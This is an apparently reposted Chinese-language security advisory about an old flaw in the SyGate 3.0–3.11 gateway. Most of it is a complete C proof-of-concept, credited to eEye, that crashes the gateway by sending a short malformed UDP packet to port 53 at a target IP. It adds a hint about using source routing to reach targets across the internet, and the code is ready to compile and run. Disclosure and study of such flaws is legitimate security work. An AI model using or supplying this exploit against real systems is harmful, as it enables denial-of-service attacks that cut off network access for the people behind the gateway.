| 涉及程序: SyGate 3.0/3.1/3.11
 
 描述:
 局域网内任何人能使 Sygate 崩溃
 
 
 详细:
 本地网络上的攻击者通过发送不正常的包到 Sygate UDP 端口可使 Sygate 网关崩溃。
 
 以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
 
 
 /*
 Sygate Crash by: [email protected] (April-00)
 http://www.eEye.com
 Will crash Sygate (http://www.sygate.com/) when ran from the internal LAN.
 Play with source routing to get it to work across the internet.
 Just hit the Internal IP of the Sygate machine.
 */
 
 #include <stdio.h>
 #include <arpa/inet.h>
 
 int main (int argc, char **argv)
 {
 int SockFD, addrlen, bsent;
 struct sockaddr_in UDPSock;
 char bomb[]= "changeiscoming";
 
 printf("Sygate Crash by: [email protected]\n");
 printf("http://www.eEye.com\n\n");
 
 if(argc<2){
 printf("Usage: %s [server]\n",argv[0]);
 exit(1);
 }
 
 SockFD=socket(AF_INET, SOCK_DGRAM, 0);
 
 UDPSock.sin_family=AF_INET;
 UDPSock.sin_addr.s_addr=inet_addr(argv[1]);
 UDPSock.sin_port=htons(53);
 
 bsent=sendto(SockFD,&bomb,13,0,(struct sockaddr *) &UDPSock,
 sizeof(struct sockaddr_in));
 
 printf("Sent Crash.\nBytes Sent: %i\n",bsent);
 }
 
  
 
 |